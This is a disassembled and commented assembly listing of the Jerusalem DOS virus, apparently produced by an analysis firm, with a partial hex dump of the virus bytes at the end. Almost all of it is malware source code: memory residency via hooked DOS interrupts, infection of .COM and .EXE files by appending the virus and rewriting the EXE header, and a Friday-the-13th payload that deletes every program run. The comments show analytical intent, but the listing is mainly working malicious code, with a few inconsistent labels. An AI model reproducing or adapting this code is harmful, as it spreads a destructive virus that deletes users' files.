CODE SEGMENT ;The following is a disassembled, structured and commented listing of the ;Jerusalem .COM and .EXE infector virus. All comments, structure inclusions ; ; INTERPATH ; 4423 Cheeney Street ; Santa Clara, CA 95054 ;-----------------------------------------------------------------------; ; THE "JERUSALEM" VIRUS ; ;-----------------------------------------------------------------------; ; ORG 100H ; ; ;-----------------------------------------------------------------------; ; JERUSALEM VIRUS ; ;-----------------------------------------------------------------------; BEGIN_COM: ; COM FILES START HERE JMP CONTINUE ; ; ;-----------------------------------------------------------------------; ; ; ;-----------------------------------------------------------------------; A0103 DB 073H,055H MS_DOS DB 'MsDos' ; DB 000H,001H,015H,018H TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED! DB 000H A0010 DB 000H A0011 DW 100H ;HOST SIZE (BEFORE INFECTION) OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC) OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR OLD_24 DW 0556H,16A5H ;001B A_FLAG DW 7E48H ;??? A0021 DB 000H,000H,000H,000H,000H,000H,000H DB 000H,000H,000H,000H A002C DW 0 ;A SEGMENT DB 000H,000H A0030 DB 000H A0031 DW 0178EH ;OLD ES VALUE A0033 DW 0080H ; ; EXEC_BLOCK DW 0 ;ENV. SEG. ADDRESS ;0035 DW 80H ;COMMAND LINE ADDRESS DW 178EH ;+4 DW 005CH ;FCB #1 ADDRESS DW 178EH ;+8 DW 006CH ;FCB #2 ADDRESS DW 0178EH ;+12 ; HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043 HOST_SS DW 347AH ;(AT TIME OF INFECTION) HOST_IP DW 00C5H ; HOST_CS DW 347AH ; ;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF ; A004B DW 0F010H ; A004D DB 82H ; A004E DB 0 ; EXE_HDR DB 1CH DUP (?) ;004F A006B DB 5 DUP (?) ;LAST 5 BYTES OF HOST HANDLE DW 0005H ;0070 HOST_ATT DW 0020H ;0072 HOST_DATE DW 0021H ;0074 HOST_TIME DW 002DH ;0076 BLOCK_SIZE DW 512 ;512 BYTES/BLOCK A007A DW 0010H HOST_SIZE DW 27C0H,0001H ;007C HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME COMMAND_COM DB 'COMMAND.COM' DB 1 A0090 DB 0,0,0,0,0 ;-----------------------------------------------------------------------; ; ; ;-----------------------------------------------------------------------; CONTINUE: ; CLD ; MOV AH,0E0H ;DO A ???... INT 21H ; ; CMP AH,0E0H ; JNC L01B5 ; CMP AH,3 ; JC L01B5 ; ; MOV AH,0DDH ; MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE ADD SI,DI ;SI = BEGINNING OF HOST CODE MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?) INT 21H ; ; L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H ADD AX,10H ; MOV SS,AX ;SS = TWEEKed CS MOV SP,700H ;SP = END OF OUR CODE (VIRUS) ; ;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF ; PUSH AX ;JMP FAR CS+10H:IP-100H MOV AX,offset BEGIN_EXE - offset BEGIN_COM PUSH AX ; RETF ; ; ;---------------------------------------; ORG 0C5h ; ;---------------------------------------; ; BEGIN_EXE: ;EXE FILES START HERE CLD ; PUSH ES ; ; MOV CS:[A0031],ES ; MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES MOV CS:[EXEC_BLOCK+8],ES ; MOV CS:[EXEC_BLOCK+12],ES ; ; MOV AX,ES ;TWEEK ES SAME AS CS ABOVE ADD AX,10H ; ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE ADD CS:[HOST_SS],AX ; ; MOV AH,0E0H ; INT 21H ; ; CMP AH,0E0H ; JNC L0106 ;00F1 7313 ; CMP AH,3 ; POP ES ;00F6 MOV SS,CS:[HOST_SS] ; MOV SP,CS:[HOST_SP] ; JMP far CS:[HSOT_IP] ; ; L0106: XOR AX,AX ;0106 33C0 MOV ES,AX ;0108 8EC0 MOV AX,ES:[03FC] ;010A 26A1FC03 MOV CS:[A004B],AX ;010E 2EA34B00 MOV AL,ES:[03FE] ;0112 26A0FE03 MOV CS:[A004D],AL ;0116 2EA24D00 MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5 MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB POP AX ;0127 58 ADD AX,10H ;0128 051000 MOV ES,AX ;012B 8EC0 PUSH CS ;012D 0E POP DS ;012E 1F MOV CX,710H ;SIZE OF VIRUS CODE SHR CX,1 ;0132 D1E9 XOR SI,SI ;0134 33F6 MOV DI,SI ;0136 8BFE PUSH ES ;0138 06 MOV AX,0142 ;0139 B84201 PUSH AX ;013C 50 JMP 0000:03FC ;013D EAFC030000 ; MOV AX,CS ;0142 8CC8 MOV SS,AX ;0144 8ED0 MOV SP,700H ;0146 BC0007 XOR AX,AX ;0149 33C0 MOV DS,AX ;014B 8ED8 MOV AX,CS:[A004B] ;014D 2EA14B00 MOV [03FC],AX ;0151 A3FC03 MOV AL,CS:[A004D] ;0154 2EA04D00 MOV [03FE],AL ;0158 A2FE03 MOV BX,SP ;015B 8BDC MOV CL,04 ;015D B104 SHR BX,CL ;015F D3EB ADD BX,+10 ;0161 83C310 MOV CS:[A0033],BX ; ; MOV AH,4AH ; MOV ES,CS:[A0031] ; INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS ; MOV AX,3521 ; INT 21H ;GET VECTOR MOV CS:[OLD_21],BX ; MOV CS:[OLD_21+2],ES ; ; PUSH CS ;0181 0E POP DS ;0182 1F MOV DX,offset NEW_INT_21 ;0183 BA5B02 MOV AX,2521 ; INT 21H ;SAVE VECTOR ; MOV ES,[A0031] ;018B 8E063100 MOV ES,ES:[A002C] ;018F 268E062C00 XOR DI,DI ;0194 33FF MOV CX,7FFFH ;0196 B9FF7F XOR AL,AL ;0199 32C0 REPNE SCASB ;019C AE CMP ES:[DI],AL ;019D 263805 LOOPNZ 019B ;01A0 E0F9 MOV DX,DI ;01A2 8BD7 ADD DX,+03 ;01A4 83C203 MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM PUSH ES ; POP DS ; PUSH CS ; POP ES ; MOV BX,35H ; ; PUSH DS ;01B1 ; PUSH ES ; PUSH AX ; PUSH BX ; PUSH CX ; PUSH DX ; ; MOV AH,2AH ; INT 21H ;GET DATE ; MOV Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE" ; CMP CX,1987 ;IF 1987... JE L01F7 ;...JUMP CMP AL,5 ;IF NOT FRIDAY... JNE L01D8 ;...JUMP CMP DL,0DH ;IF DATE IS NOT THE 13th... JNE L01D8 ;...JUMP INC Byte ptr CS:[TIME_BOMB] ;TIC THE BOMB COUNT JMP L01F7 ; ; L01D8: MOV AX,3508H ;GET CLOCK TIMER VECTOR INT 21H ;GET VECTOR MOV CS:[OLD_08],BX ; MOV CS:[OLD_08],ES ; ; PUSH CS ;DS=CS POP DS ; ; MOV Word ptr [A_FLAG],7E90H ; ; MOV AX,2508H ;SET NEW CLOCK TIC HANDLER MOV DX,offset NEW_08 ; INT 21H ;SET VECTOR ; L01F7: POP DX ; POP CX ; POP BX ; POP AX ; POP ES ; POP DS ; PUSHF ; CALL far CS:[OLD_21] ; PUSH DS ; POP ES ; ; MOV AH,49H ; INT 21H ;FREE ALLOCATED MEMORY ; MOV AH,4DH ; INT 21H ;GET RETURN CODE OF A SUBPROCESS ; ;---------------------------------------; ; THIS IS WHERE WE REMAIN RESIDENT ; ;---------------------------------------; MOV AH,31H ; MOV DX,0600H ;020F ; MOV CL,04 ; SHR DX,CL ; ADD DX,10H ; INT 21H ;TERMINATE AND REMAIN RESIDENT ; ;---------------------------------------; NEW_24: XOR AL,AL ;021B ;CRITICAL ERROR HANDLER IRET ; ; ;-----------------------------------------------------------------------; ; NEW INTERRUPT 08 (CLOCK TIC) HANDLER ; ;-----------------------------------------------------------------------; NEW_08: CMP Word ptr CS:[A_FLAG],2 ;021E JNE N08_10 ;IF ... JUMP ; PUSH AX ; PUSH BX ; PUSH CX ; PUSH DX ; PUSH BP ; MOV AX,0602H ;SCROLL UP TWO LINES MOV BH,87H ;INVERSE VIDEO ATTRIBUTE MOV CX,0505H ;UPPER LEFT CORNER MOV DX,1010H ;LOWER RIGHT CORNER INT 10H ; POP BP ; POP DX ; POP CX ; POP BX ; POP AX ; ; N08_10: DEC Word ptr CS:[A_FLAG] ;ASSURE THAT THIS ONLY HAPPENS ONCE JNZ N08_90 ; BY RESETTING TO 1 IF EQUAL TO ZERO MOV Word ptr CS:[A_FLAG],1 ; ; PUSH AX ;????? IS THIS SOME KIND OF DELAY ????? PUSH CX ;*** COMMENTS SOLICITED **** PUSH SI ; MOV CX,4001H ; REP LODSB ; POP SI ; POP CX ; POP AX ; ; N08_90: JMP far CS:[OLD_08] ;PASS CONTROL TO OLD INT 08 VECTOR ; ;-----------------------------------------------------------------------; ; NEW INTERRUPT 21 HANDLER ; ;-----------------------------------------------------------------------; NEW_21: PUSHF ;025B ; CMP AH,0E0H ;IF A E0 REQUEST... JNE N21_10 ; MOV AX,300H ;...RETURN AX = 300H POPF ; (OUR PUSHF) IRET ; ; N21_10: CMP AH,0DDH ;0266 ; JE N21_30 ;IF DDH...JUMP TO _30 CMP AH,0DEH ; JE N21_40 ;IF DEH...JUMP TO _40 CMP AX,4B00H ;IF SPAWN A PROG... JNE N21_20 ; JMP N21_50 ;...JUMP TO _50 ; N21_20: POPF ; (OUR PUSHF) JMP far CS:[OLD_21] ;ANY OTHER INT 21 GOES TO OLD VECTOR ; N21_30: POP AX ;REMOVE OUR (PUSHF) POP AX ;? MOV AX,100H ; MOV CS:[000A],AX ; POP AX ; MOV CS:[000C],AX ; REP MOVSB ; POPF ; (OUR PUSHF) MOV AX,CS:[000F] ; JMP far CS:[000A] ; ; N21_40: ADD SP,+06 ;0298 ; POPF ; (OUR PUSHF) MOV AX,CS ; MOV SS,AX ; MOV SP,710H ;SIZE OF VIRUS CODE PUSH ES ; PUSH ES ;02A4 06 XOR DI,DI ;02A5 33FF PUSH CS ;02A7 0E POP ES ;02A8 07 MOV CX,0010 ;02A9 B91000 MOV SI,BX ;02AC 8BF3 MOV DI,0021 ;02AE BF2100 REP MOVSB ;02B2 A4 MOV AX,DS ;02B3 8CD8 MOV ES,AX ;02B5 8EC0 MUL Word ptr CS:[A007A] ;02B7 2EF7267A00 ADD AX,CS:[002B] ;02BC 2E03062B00 ADC DX,+00 ;02C1 83D200 DIV Word ptr CS:[A007A] ;02C4 2EF7367A00 MOV DS,AX ;02C9 8ED8 MOV SI,DX ;02CB 8BF2 MOV DI,DX ;02CD 8BFA MOV BP,ES ;02CF 8CC5 MOV BX,CS:[002F] ;02D1 2E8B1E2F00 OR BX,BX ;02D6 0BDB JE 02ED ;02D8 7413 MOV CX,8000 ;02DA B90080 REP MOVSW ;02DE A5 ADD AX,1000 ;02DF 050010 ADD BP,1000 ;02E2 81C50010 MOV DS,AX ;02E6 8ED8 MOV ES,BP ;02E8 8EC5 DEC BX ;02EA 4B JNE 02DA ;02EB 75ED MOV CX,CS:[002D] ;02ED 2E8B0E2D00 REP MOVSB ;02F3 A4 POP AX ;02F4 58 PUSH AX ;02F5 50 ADD AX,0010 ;02F6 051000 ADD CS:[0029],AX ;02F9 2E01062900 ADD CS:[0025],AX ;02FE 2E01062500 MOV AX,CS:[0021] ;0303 2EA12100 POP DS ;0307 1F POP ES ;0308 07 MOV SS,CS:[0029] ;0309 2E8E162900 MOV SP,CS:[0027] ;030E 2E8B262700 JMP far CS:[0023] ;0313 2EFF2E2300 ; ;---------------------------------------; ; IT IS TIME FOR THIS FILE TO DIE... ; ; THIS IS WHERE IT GETS DELETED ! ; ;---------------------------------------; N21_5A: XOR CX,CX ; MOV AX,4301H ; INT 21H ;CHANGE FILE MODE (ATT=0) ; MOV AH,41H ; INT 21H ;DELETE A FILE ; MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM POPF ; (OUR PUSHF) JMP far CS:[OLD_21] ; ; ;---------------------------------------; ; START INFECTION ; ;---------------------------------------; N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE... JE N21_5A ;...JUMP ; MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN MOV Word ptr CS:[A008F],0 ; MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME MOV word ptr CS:[HOST_NAME+2],DS ; ; ;INFECTION PROCESS OCCURS HERE ; PUSH AX ;034C 50 PUSH BX ;034D 53 PUSH CX ;034E 51 PUSH DX ;034F 52 PUSH SI ;0350 56 PUSH DI ;0351 57 PUSH DS ;0352 1E PUSH ES ;0353 06 CLD ;0354 FC MOV DI,DX ;0355 8BFA XOR DL,DL ;0357 32D2 CMP Byte ptr [DI+01],3A ;0359 807D013A JNE L0364 ;035D 7505 MOV DL,[DI] ;035F 8A15 AND DL,1F ;0361 80E21F ; L0364: MOV AH,36 ; INT 21H ;GET DISK FREE SPACE CMP AX,-1 ;0368 3DFFFF JNE L0370 ;036B 7503 L036D: JMP I_90 ;036D E97702 ; L0370: MUL BX ;0370 F7E3 MUL CX ;0372 F7E1 OR DX,DX ;0374 0BD2 JNE L037D ;0376 7505 CMP AX,710H ;0378 3D1007 JC L036D ;037B 72F0 L037D: MOV DX,word ptr CS:[HOST_NAME] PUSH DS ;0382 1E POP ES ;0383 07 XOR AL,AL ;0384 32C0 MOV CX,41 ;0386 B94100 REPNE SCASB ;038A AE MOV SI,word ptr CS:[HOST_NAME] L0390: MOV AL,[SI] ;0390 8A04 OR AL,AL ;0392 0AC0 JE L03A4 ;0394 740E CMP AL,61 ;0396 3C61 JC L03A1 ;0398 7207 CMP AL,7A ;039A 3C7A JA L03A1 ;039C 7703 SUB Byte ptr [SI],20 ;039E 802C20 L03A1: INC SI ;03A1 46 JMP L0390 ;03A2 EBEC ; L03A4: MOV CX,000B ;03A4 B90B00 SUB SI,CX ;03A7 2BF1 MOV DI,offset COMMAND_COM ;03A9 BF8400 PUSH CS ;03AC 0E POP ES ;03AD 07 MOV CX,000B ;03AE B90B00 REPE CMPSB ;03B2 A6 JNE L03B8 ;03B3 7503 JMP I_90 ;03B5 E92F02 ; L03B8: MOV AX,4300H ; INT 21H ;CHANGE FILE MODE JC L03C4 ;03BD 7205 ; MOV CS:[HOST_ATT],CX ;03BF ; L03C4: JC L03EB ;03C4 7225 XOR AL,AL ;03C6 32C0 MOV CS:[A004E],AL ;03C8 2EA24E00 PUSH DS ;03CC 1E POP ES ;03CD 07 MOV DI,DX ;03CE 8BFA MOV CX,41 ;03D0 B94100 REPNZ SCASB ;03D4 AE CMP Byte ptr [DI-02],4D ;03D5 807DFE4D JE L03E6 ;03D9 740B CMP Byte ptr [DI-02],6D ;03DB 807DFE6D JE L03E6 ;03DF 7405 INC Byte ptr CS:[A004E] ;03E1 2EFE064E00 ; L03E6: MOV AX,3D00H ; INT 21H ;OPEN FILE READ ONLY L03EB: JC L0447 ; MOV CS:[HANDLE],AX ;03ED ; ; MOV BX,AX ;MOVE TO END OF FILE -5 MOV AX,4202 ; MOV CX,-1 ;FFFFFFFB MOV DX,-5 ; INT 21H ;MOVE FILE POINTER JC L03EB ; ; ADD AX,5 ;0400 ; MOV CS:[A0011],AX ;?SAVE HOST SIZE ; MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST MOV DX,offset A006B ; MOV AX,CS ; MOV DS,AX ; MOV ES,AX ; MOV AH,3FH ; INT 21H ;READ FROM A FILE ; MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos' MOV SI,offset MS_DOS ; REPE CMPSB ; JNE L0427 ; MOV AH,3E ;IF == 'MsDos'... INT 21H ;CLOSE FILE JMP I_90 ;...PASS CONTROL TO DOS ; L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR INT 21H ;GET VECTOR MOV [OLD_24],BX ; MOV [OLD_24+2],ES ; ; MOV DX,offset NEW_24 ; MOV AX,2524 ;SET CRITICAL ERROR VECTOR INT 21H ;SET VECTOR ; LDS DX,dword ptr [HOST_NAME]; XOR CX,CX ; MOV AX,4301H ; INT 21H ;CHANGE FILE MODE L0447: JC L0484 ; ; MOV BX,CS:[HANDLE] ; MOV AH,3E ; INT 21H ;CLOSE FILE ; MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE ; MOV AX,3D02 ; INT 21H ;OPEN FILE R/W JC L0484 ; ; MOV CS:[HANDLE],AX ;0460 2EA37000 MOV AX,CS ;0464 8CC8 MOV DS,AX ;0466 8ED8 MOV ES,AX ;0468 8EC0 MOV BX,[HANDLE] ;046A 8B1E7000 MOV AX,5700 ;046E B80057 INT 21H ;GET/SET FILE DATE TIME ; MOV [HOST_DATE],DX ;0473 89167400 MOV [HOST_TIME],CX ;0477 890E7600 MOV AX,4200 ;047B B80042 XOR CX,CX ;047E 33C9 MOV DX,CX ;0480 8BD1 INT 21H ;MOVE FILE POINTER L0484: JC L04C3 ;0484 723D ; CMP Byte ptr [A004E],00 ;0486 803E4E0000 JE L0490 ;048B 7403 JMP L04E6 ;048D EB57 ; NOP ;048F 90 L0490: MOV BX,1000 ;0490 BB0010 MOV AH,48 ;0493 B448 INT 21H ;ALLOCATE MEMORY JNC L04A4 ;0497 730B ; MOV AH,3E ;0499 B43E MOV BX,[HANDLE] ;049B 8B1E7000 INT 21H ;CLOSE FILE (OBVIOUSLY) JMP I_90 ;04A1 E94301 ; L04A4: INC Word ptr [A008F] ;04A4 FF068F00 MOV ES,AX ;04A8 8EC0 XOR SI,SI ;04AA 33F6 MOV DI,SI ;04AC 8BFE MOV CX,710H ;04AE B91007 REP MOVSB ;04B2 A4 MOV DX,DI ;04B3 8BD7 MOV CX,[A0011] ;?GET HOST SIZE - YES MOV BX,[70H] ;04B9 8B1E7000 PUSH ES ;04BD 06 POP DS ;04BE 1F MOV AH,3FH ;04BF B43F INT 21H ;READ FROM A FILE L04C3: JC L04E1 ;04C3 721C ; ADD DI,CX ;04C5 03F9 ; XOR CX,CX ;POINT TO BEGINNING OF FILE MOV DX,CX ; MOV AX,4200H ; INT 21H ;MOVE FILE POINTER ; MOV SI,offset MS_DOS ;04D0 BE0500 MOV CX,5 ;04D3 B90500 REP CS:MOVSB ;04D7 2EA4 MOV CX,DI ;04D9 8BCF XOR DX,DX ;04DB 33D2 MOV AH,40H ; INT 21H ;WRITE TO A FILE L04E1: JC L04F0 ; JMP L05A2 ; ; ;---------------------------------------; ; READ EXE HEADER ; ;---------------------------------------; L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER MOV DX,offset EXE_HDR ; MOV AH,3F ; INT 21H ;READ FILE JC L053C ; ; ;---------------------------------------; ; TWEEK EXE HEADER TO INFECTED HSOT ; ;---------------------------------------; MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO MOV AX,[EXE_HDR+14] ; SS MOV [HOST_SS],AX ; MOV AX,[EXE_HDR+16] ; SP MOV [HOST_SP],AX ; MOV AX,[EXE_HDR+20] ; IP MOV [HOST_IP],AX ; MOV AX,[EXE_HDR+22] ; CS MOV [HOST_CS],AX ; MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS) CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512 JZ L051B ;IF FILE SIZE==0...JMP DEC AX ; L051B: MUL Word ptr [BLOCK_SIZE] ; ADD AX,[EXE_HDR+2] ; ADC DX,0 ;AX NOW = FILE SIZE ; ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. BOUND ADC DX,0 ; AND AX,0FFF0H ; MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS MOV [HOST_SIZE+2],DX ; ; ADD AX,710H ;(SIZE OF VIRUS) ADC DX,0 ; L053C: JC L0578 ;IF > FFFFFFFF...JMP DIV Word ptr [BLOCK_SIZE] ; OR DX,DX ; JE L0547 ; INC AX ; L0547: MOV [EXE_HDR+4],AX ; MOV [EXE_HDR+2],DX ; ;---------------; MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE MOV DX,[HOST_SIZE+2] ; DIV Word ptr [A007A] ; SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR MOV [EXE_HDR+22],AX ;VALUE OF CS MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP MOV [EXE_HDR+14],AX ;VALUE OF SS MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP ;---------------; XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR) MOV DX,CX ; MOV AX,4200H ; INT 21H ;MOVE FILE POINTER L0578: JC L0584 ; ; ;---------------------------------------; ; WRITE INFECTED EXE HEADER ; ;---------------------------------------; MOV CX,1CH ; MOV DX,offset EXE_HDR ; MOV AH,40H ; INT 21H ;WRITE TO A FILE L0584: JC L0597 ; CMP AX,CX ; JNE L05A2 ; ; MOV DX,[HOST_SIZE] ;POINT TO END OF FILE MOV CX,[HOST_SIZE+2] ; MOV AX,4200 ; INT 21H ;MOVE FILE POINTER L0597: JC L05A2 ; ; ;---------------------------------------; ; WRITE VIRUS CODE TO END OF HOST ; ;---------------------------------------; XOR DX,DX ; MOV CX,710H ;(SIZE OF VIRUS) MOV AH,40H ; INT 21H ;WRITE TO A FILE ; L05A2: CMP Word ptr CS:[008F],0 ;IF... JZ L05AE ;...SKIP MOV AH,49H ; INT 21H ;FREE ALLOCATED MEMORY ; L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ... JE I_90 ;...SKIP ; MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME MOV DX,CS:[HOST_DATE] ; MOV CX,CS:[HOST_TIME] ; MOV AX,5701H ; INT 21H ;GET/SET FILE DATE/TIME ; MOV AH,3EH ; INT 21H ;CLOSE FILE ; LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE MOV CX,CS:[HOST_ATT] ; MOV AX,4301H ; INT 21H ;CHANGE FILE MODE ; LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER MOV AX,2524H ; INT 21H ;SET VECTOR ; I_90: POP ES ; POP DS ; POP DI ; POP SI ; POP DX ; POP CX ; POP BX ; POP AX ; POPF ; (OUR PUSHF) JMP far CS:[OLD_21] ;PASS CONTROL TO DOS ; ;-----------------------------------------------------------------------; ; ; ;-----------------------------------------------------------------------; ;0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 15 18 00 00 i..sUMsDos...... ;0110 00 00 01 A5 FE 00 F0 60-14 4E 02 56 05 A5 16 48 ...%~.p`.N.V.%.H ;0120 7E 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ~............... ;0130 00 8E 17 80 00 00 00 80-00 8E 17 5C 00 8E 17 6C ...........\...l ;0140 00 8E 17 10 07 7A 34 C5-00 7A 34 10 F0 82 00 4D .....z4E.z4.p..M ;0150 5A D0 00 98 00 31 00 20-00 11 00 FF FF 5C 12 10 ZP...1. .....\.. ;0160 07 84 19 C5 00 5C 12 20-00 00 00 C3 C3 C3 C3 C3 ...E.\. ...CCCCC ;0170 05 00 20 00 21 00 2D 00-00 02 10 00 C0 27 01 00 .. .!.-.....@'.. ;0180 D9 41 28 9B 43 4F 4D 4D-41 4E 44 2E 43 4F 4D 01 YA(.COMMAND.COM. ;0190 00 00 00 00 00 FC B4 E0-CD 21 80 FC E0 73 16 80 .....|4`M!.|`s.. ;01A0 FC 03 72 11 B4 DD BF 00-01 BE 10 07 03 F7 2E 8B |.r.4]?..>...w.. ;01B0 8D 11 00 CD 21 8C C8 05-10 00 8E D0 BC 00 07 50 ...M!.H....P<..P ;01C0 B8 C5 00 50 CB FC 06 2E-8C 06 31 00 2E 8C 06 39 8E.PK|....1....9 ;01D0 00 2E 8C 06 3D 00 2E 8C-06 41 00 8C C0 05 10 00 ....=....A..@... ;01E0 2E 01 06 49 00 2E 01 06-45 00 B4 E0 CD 21 80 FC ...I....E.4`M!.| ;01F0 E0 73 13 80 FC 03 07 2E-8E 16 45 00 2E 8B 26 43 `s..|.....E...&C ;0200 00 2E FF 2E 47 00 33 C0-8E C0 26 A1 FC 03 2E A3 ....G.3@.@&!|..# ;0210 4B 00 26 A0 FE 03 2E A2-4D 00 26 C7 06 FC 03 F3 K.& ~.."M.&G.|.s ;0220 A5 26 C6 06 FE 03 CB 58-05 10 00 8E C0 0E 1F B9 %&F.~.KX....@..9 ;0230 10 07 D1 E9 33 F6 8B FE-06 B8 42 01 50 EA FC 03 ..Qi3v.~.8B.Pj|. ;0240 00 00 8C C8 8E D0 BC 00-07 33 C0 8E D8 2E A1 4B ...H.P<..3@.X.!K ;0250 00 A3 FC 03 2E A0 4D 00-A2 FE 03 8B DC B1 04 D3 .#|.. M."~..\1.S ;0260 EB 83 C3 10 2E 89 1E 33-00 B4 4A 2E 8E 06 31 00 k.C....3.4J...1. ;0270 CD 21 B8 21 35 CD 21 2E-89 1E 17 00 2E 8C 06 19 M!8!5M!......... ;0280 00 0E 1F BA 5B 02 B8 21-25 CD 21 8E 06 31 00 26 ...:[.8!%M!..1.& ;0290 8E 06 2C 00 33 FF B9 FF-7F 32 C0 F2 AE 26 38 05 ..,.3.9..2@r.&8. ;02A0 E0 F9 8B D7 83 C2 03 B8-00 4B 06 1F 0E 07 BB 35 `y.W.B.8.K....;5 ;02B0 00 1E 06 50 53 51 52 B4-2A CD 21 2E C6 06 0E 00 ...PSQR4*M!.F... ;02C0 00 81 F9 C3 07 74 30 3C-05 75 0D 80 FA 0D 75 08 ..yC.t0<.u..z.u. ;02D0 2E FE 06 0E 00 EB 20 90-B8 08 35 CD 21 2E 89 1E .~...k .8.5M!... ;02E0 13 00 2E 8C 06 15 00 0E-1F C7 06 1F 00 90 7E B8 .........G....~8 ;02F0 08 25 BA 1E 02 CD 21 5A-59 5B 58 07 1F 9C 2E FF .%:..M!ZY[X..... ;0300 1E 17 00 1E 07 B4 49 CD-21 B4 4D CD 21 B4 31 BA .....4IM!4MM!41: ;0310 00 06 B1 04 D3 EA 83 C2-10 CD 21 32 C0 CF 2E 83 ..1.Sj.B.M!2@O.. ;0320 3E 1F 00 02 75 17 50 53-51 52 55 B8 02 06 B7 87 >...u.PSQRU8..